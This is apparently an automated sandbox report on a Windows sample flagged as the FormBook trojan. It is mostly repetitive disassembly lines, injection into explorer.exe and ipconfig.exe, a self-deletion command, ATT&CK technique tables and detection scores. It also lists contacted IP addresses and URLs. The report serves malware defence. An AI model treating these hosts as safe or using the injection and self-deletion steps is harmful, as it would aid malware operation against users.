              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01808243 mov eax, dword ptr fs:[00000030h]0_2_01808243
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01808243 mov ecx, dword ptr fs:[00000030h]0_2_01808243
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902A0 mov eax, dword ptr fs:[00000030h]0_2_017902A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902A0 mov eax, dword ptr fs:[00000030h]0_2_017902A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE284 mov eax, dword ptr fs:[00000030h]0_2_017BE284
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE284 mov eax, dword ptr fs:[00000030h]0_2_017BE284
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B656A mov eax, dword ptr fs:[00000030h]0_2_017B656A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B656A mov eax, dword ptr fs:[00000030h]0_2_017B656A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B656A mov eax, dword ptr fs:[00000030h]0_2_017B656A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018005A7 mov eax, dword ptr fs:[00000030h]0_2_018005A7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018005A7 mov eax, dword ptr fs:[00000030h]0_2_018005A7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018005A7 mov eax, dword ptr fs:[00000030h]0_2_018005A7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788550 mov eax, dword ptr fs:[00000030h]0_2_01788550
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788550 mov eax, dword ptr fs:[00000030h]0_2_01788550
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01816500 mov eax, dword ptr fs:[00000030h]0_2_01816500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC5ED mov eax, dword ptr fs:[00000030h]0_2_017BC5ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC5ED mov eax, dword ptr fs:[00000030h]0_2_017BC5ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017825E0 mov eax, dword ptr fs:[00000030h]0_2_017825E0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017865D0 mov eax, dword ptr fs:[00000030h]0_2_017865D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA5D0 mov eax, dword ptr fs:[00000030h]0_2_017BA5D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA5D0 mov eax, dword ptr fs:[00000030h]0_2_017BA5D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE5CF mov eax, dword ptr fs:[00000030h]0_2_017BE5CF
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE5CF mov eax, dword ptr fs:[00000030h]0_2_017BE5CF
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A45B1 mov eax, dword ptr fs:[00000030h]0_2_017A45B1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A45B1 mov eax, dword ptr fs:[00000030h]0_2_017A45B1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE59C mov eax, dword ptr fs:[00000030h]0_2_017BE59C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B4588 mov eax, dword ptr fs:[00000030h]0_2_017B4588
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01782582 mov eax, dword ptr fs:[00000030h]0_2_01782582
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01782582 mov ecx, dword ptr fs:[00000030h]0_2_01782582
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AA470 mov eax, dword ptr fs:[00000030h]0_2_017AA470
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AA470 mov eax, dword ptr fs:[00000030h]0_2_017AA470
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AA470 mov eax, dword ptr fs:[00000030h]0_2_017AA470
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A245A mov eax, dword ptr fs:[00000030h]0_2_017A245A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177645D mov eax, dword ptr fs:[00000030h]0_2_0177645D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180A4B0 mov eax, dword ptr fs:[00000030h]0_2_0180A4B0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA430 mov eax, dword ptr fs:[00000030h]0_2_017BA430
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177C427 mov eax, dword ptr fs:[00000030h]0_2_0177C427
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E420 mov eax, dword ptr fs:[00000030h]0_2_0177E420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E420 mov eax, dword ptr fs:[00000030h]0_2_0177E420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E420 mov eax, dword ptr fs:[00000030h]0_2_0177E420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B8402 mov eax, dword ptr fs:[00000030h]0_2_017B8402
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B8402 mov eax, dword ptr fs:[00000030h]0_2_017B8402
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B8402 mov eax, dword ptr fs:[00000030h]0_2_017B8402
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017804E5 mov ecx, dword ptr fs:[00000030h]0_2_017804E5
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B44B0 mov ecx, dword ptr fs:[00000030h]0_2_017B44B0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017864AB mov eax, dword ptr fs:[00000030h]0_2_017864AB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180C460 mov ecx, dword ptr fs:[00000030h]0_2_0180C460
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788770 mov eax, dword ptr fs:[00000030h]0_2_01788770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182678E mov eax, dword ptr fs:[00000030h]0_2_0182678E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018347A0 mov eax, dword ptr fs:[00000030h]0_2_018347A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780750 mov eax, dword ptr fs:[00000030h]0_2_01780750
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2750 mov eax, dword ptr fs:[00000030h]0_2_017C2750
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2750 mov eax, dword ptr fs:[00000030h]0_2_017C2750
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B674D mov esi, dword ptr fs:[00000030h]0_2_017B674D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B674D mov eax, dword ptr fs:[00000030h]0_2_017B674D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B674D mov eax, dword ptr fs:[00000030h]0_2_017B674D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018007C3 mov eax, dword ptr fs:[00000030h]0_2_018007C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B273C mov eax, dword ptr fs:[00000030h]0_2_017B273C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B273C mov ecx, dword ptr fs:[00000030h]0_2_017B273C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B273C mov eax, dword ptr fs:[00000030h]0_2_017B273C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FC730 mov eax, dword ptr fs:[00000030h]0_2_017FC730
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC720 mov eax, dword ptr fs:[00000030h]0_2_017BC720
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC720 mov eax, dword ptr fs:[00000030h]0_2_017BC720
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180E7E1 mov eax, dword ptr fs:[00000030h]0_2_0180E7E1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780710 mov eax, dword ptr fs:[00000030h]0_2_01780710
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B0710 mov eax, dword ptr fs:[00000030h]0_2_017B0710
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC700 mov eax, dword ptr fs:[00000030h]0_2_017BC700
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017847FB mov eax, dword ptr fs:[00000030h]0_2_017847FB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017847FB mov eax, dword ptr fs:[00000030h]0_2_017847FB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A27ED mov eax, dword ptr fs:[00000030h]0_2_017A27ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A27ED mov eax, dword ptr fs:[00000030h]0_2_017A27ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A27ED mov eax, dword ptr fs:[00000030h]0_2_017A27ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178C7C0 mov eax, dword ptr fs:[00000030h]0_2_0178C7C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01804755 mov eax, dword ptr fs:[00000030h]0_2_01804755
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017807AF mov eax, dword ptr fs:[00000030h]0_2_017807AF
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180E75D mov eax, dword ptr fs:[00000030h]0_2_0180E75D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B2674 mov eax, dword ptr fs:[00000030h]0_2_017B2674
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA660 mov eax, dword ptr fs:[00000030h]0_2_017BA660
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA660 mov eax, dword ptr fs:[00000030h]0_2_017BA660
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179C640 mov eax, dword ptr fs:[00000030h]0_2_0179C640
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178262C mov eax, dword ptr fs:[00000030h]0_2_0178262C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B8620 mov eax, dword ptr fs:[00000030h]0_2_017B8620
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B6620 mov eax, dword ptr fs:[00000030h]0_2_017B6620
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\explorer.exe Network Connect: 76.223.105.230 80
              Source: C:\Windows\explorer.exe Network Connect: 45.88.201.15 80
              Source: C:\Windows\explorer.exe Network Connect: 104.16.36.105 80
              Source: C:\Windows\explorer.exe Network Connect: 35.214.118.179 80
              Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80
              Source: C:\Windows\explorer.exe Network Connect: 3.33.130.190 80
              Source: C:\Windows\explorer.exe Network Connect: 69.57.172.11 80
              Source: C:\Windows\explorer.exe Network Connect: 72.14.185.43 80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Thread register set: target process: 1028
              Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 1028
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Thread APC queued: target process: C:\Windows\explorer.exe
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: A90000
              Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\i5NDVAFg42.exe"
              Source: explorer.exe, 00000002.00000003.3094901918.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094735270.0000000009B85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4452782293.0000000009C22000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
              Source: explorer.exe, 00000002.00000002.4447822184.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1992742188.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
              Source: explorer.exe, 00000002.00000002.4449515114.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4447822184.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1992742188.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000002.00000002.4447822184.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1992742188.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: explorer.exe, 00000002.00000002.4447822184.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1992742188.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
              Source: explorer.exe, 00000002.00000000.1992382164.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4446973075.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman

              Stealing of Sensitive Information

              Source: Yara match File source: i5NDVAFg42.exe, type: SAMPLE
              Source: Yara match File source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE

              Remote Access Functionality

              Source: Yara match File source: i5NDVAFg42.exe, type: SAMPLE
              Source: Yara match File source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Shared Modules | 1 DLL Side-Loading | 512 Process Injection | 1 Rootkit | 1 Credential API Hooking | 121 Security Software Discovery | Remote Services | 1 Credential API Hooking | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 512 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 11 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              [Behavior graph (image not reproduced). ID: 1410996; Sample: i5NDVAFg42.exe; Start date: 18/03/2024; Architecture: WINDOWS; Score: 100. Process tree: i5NDVAFg42.exe -> explorer.exe (injected) -> ipconfig.exe -> cmd.exe -> conhost.exe; explorer.exe also started autochk.exe.]

              Source | Detection | Scanner | Label | Link
              i5NDVAFg42.exe | 89% | ReversingLabs | Win32.Trojan.FormBook |
              i5NDVAFg42.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
              i5NDVAFg42.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.helyibudapest.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.michellecaldwelldesign.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
